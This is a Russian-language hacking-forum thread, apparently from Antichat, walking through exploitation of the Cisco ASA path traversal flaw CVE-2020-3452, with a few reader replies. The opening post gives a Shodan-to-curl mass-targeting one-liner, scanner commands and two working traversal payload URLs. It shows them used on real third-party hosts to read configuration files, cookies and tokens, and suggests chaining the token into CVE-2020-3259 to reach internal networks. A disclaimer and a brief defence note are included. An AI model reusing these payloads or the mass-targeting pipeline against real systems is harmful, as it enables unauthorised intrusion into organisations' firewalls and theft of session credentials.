ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Веб-уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=114)
-   -   Уязвимость CVE-2020-3452 (https://forum.antichat.xyz/showthread.php?t=574667)

Vertigo 15.08.2020 05:02
https://forum.antichat.xyz/attachmen...0728c7048e.png

Приветствую Друзей,Уважаемых Форумчан и Читателей Форума.
Сегодня поговорим немного о нашумевшей уязвимости в Cisco
Оперативно искать решение проблемы IT-компании заставил Михаил Ключников.
Эксперт из Positive Technologies не впервые находит опасные уязвимости.

Данная уязвимость касается межсетевого экрана Cisco ASA.
И получив идентификатор CVE-2020-3452,она имеет высокий уровень опасности.
Если на устройстве проигнорирована проверка вводных данных,
то атакующий получает доступ к файловой системе и может читать файлы конфигурации WebVPN.

Компания Cisco срочно выпустила патч,но как всегда не все читают новости.
И по-традиции покажу как эксплуатируется такая уязвимость на реальном примере.

Администрация Форума и автор обзора напоминают о соблюдении законодательства.

Запрещено применение рассматриваемых методик атак в незаконных целях.

Информация предоставлена исключительно в рамках ознакомления и изучения проблем безопасности.

Для нахождения уязвимых целей воспользуемся поисковиком shodan.
Интерес представляют следующие версии:
Cisco ASA:9.7 ;9.8 ;9.9 ;9.10 ;9.12 ;9.13 ;9.14
Cisco FTD:6.2.2; 6.2.3 ;6.3.0 ;6.4.0 ;6.5.0 ;6.6.0

Запросы для поисковика:
+CSCOT+ ;+CSCOCA+ ;+CSCOL+ ;+CSCOU+ и +CSCOE+
Если имеется готовый api-key для shodan,то можно его вставить в этот скрипт.
И выполнить поиск из терминала:

Код:


Код:
# shodan search Cisco ASA --fields ip_str --separator " " | awk '{print $1}' | while read host do ; do curl -s -k  "https://$host/+CSCOT+/translation-tab..." ; done
Проверка на уязвимость CVE-2020-3452
Очень удобным оказался для этого сканер от PR3R00T из Англии.
Прилагается файл urls.txt ,который чистим и заполняем списком своих целей
Формат заполнения: https://IP-цели,либо https:// сайт и домен
Кто админит Cisco, могут также воспользоваться для проверки своих веб-интерфейсов сканером:

Код:


Код:
# git clone https://github.com/PR3R00T/CVE-2020-3452-Cisco-Scanner.git
# cd CVE-2020-3452-Cisco-Scanner
# chmod +x scanner.py
# python3 scanner.py urls.txt
Вот нам сканер указывает на непропатченные машины.

https://forum.antichat.xyz/attachmen...c73a1f8e00.png

Эксплуатация

Работать будем с Burpsuite,но может кому пригодиться и exploit
Вокальные данные у него неплохие,но рассчитан он на совместную работу в терминале с Nmap.
Впрочем,аналогично может обработать целый список хостов.

https://forum.antichat.xyz/attachmen...61f0ba8b84.png

В Burpsuite используются в основном 2 вида POC для атаки Path Traversal :

Код:


Код:
https:///+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
https:///+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua
Запрос при атаке в дальнейшем меняется и вместо portal_inc.lua подставляется:
Таким образом,прочитываем файлы,в которых можно найти конфиденциальную информацию.

https://forum.antichat.xyz/attachmen...e8b96b202a.png

Здесь,к примеру,найдены cookie ,token и прочее:

https://forum.antichat.xyz/attachmen...4960de950f.png

Token можно сразу же применить для раскрутки другой опасной уязвимости CVE-2020-3259
Она позволяет ввалиться во внутреннюю сеть атакуемой организации.
А если цель подвержена ещё и CVE-2020-3187,то можно отключить VPN.
Далеко так заходить конечно не станем.

У другой цели была обнаружена вот такая страница авторизации.

https://forum.antichat.xyz/attachmen...234c0cdcfd.png

И результат атаки:

https://forum.antichat.xyz/attachmen...cb31bd328d.png

Здесь без комментариев:

https://forum.antichat.xyz/attachmen...0e276cdc0f.png

Просматриваем useralert:

https://forum.antichat.xyz/attachmen...913572398c.png

Объёмный файл,в котором конфигурация,описание авторизации и местонахождения файлов с паролями:

https://forum.antichat.xyz/attachmen...4520bc3d1c.png

Защита

Защитное программное обеспечение от данной уязвимости с описанием здесь
Кроме этого,необходимо проверить конфигурацию с проверкой вводных данных.
Без кропотливой настройки веб-интерфейс может быть по-прежнему уязвим.

Тестируемые ресурсы живы и невридимы,им не причинено ущерба.
Благодарю всех за внимание и до новых встреч.

ROP 15.08.2020 10:36
Спасибо вам за статью!
Очень интересно почитать про новые уязвимости. Особенно, если они про Cisco

tanazy 18.08.2020 08:48
Спасибо, очень актуально, только закончил обновление FMC и FTD на 6.6.0.1

Vo1t 28.09.2020 11:05
Похоже это наиболее полезная статья по данной уязвимости в интернете )
Кто-нибудь разобрался, как это использовать?
Ну можно читать файлы, и что дальше?
Перспективно выглядит вот этот кусок кода

Код:


Код:
function SetSessionData(index,name,value)

  local f1
  f1=io.open("/sessions/"..index.."/session_data","w")
Но что за индекс - непонятно

elliney 19.03.2025 17:22
Всем привет!
Администрирую доставшуюся по "профессиональному наследству" Cisco ASA и решил посмотреть про её безопасность. Конечно, наткнулся на данную уязвимость и, о чудо, она в моём случае актуальна.
Но вот вопрос... Хорошо, нехорошие люди могут смотреть некоторые файлы директории webvpn и, как пишут разные источники, компрометировать сессии. Как указал последний до сего дня комментатор в теме, перспективен некий путь до session_data.
Зашёл по ssh на свою ASA и решил посмотреть, какие в принципе есть файлы в директории webvpn и, собственно, есть ли там session_data (сомнительно, ибо GET до него ничего не возвращает). Но, очутившись внутри, вижу только disk0 и ещё пару областей, в которых никакими там portal_inc.lua и прочими из данной статьи и не пахнет. Возможно ли на них выйти через SSH как-то?


Время: 01:17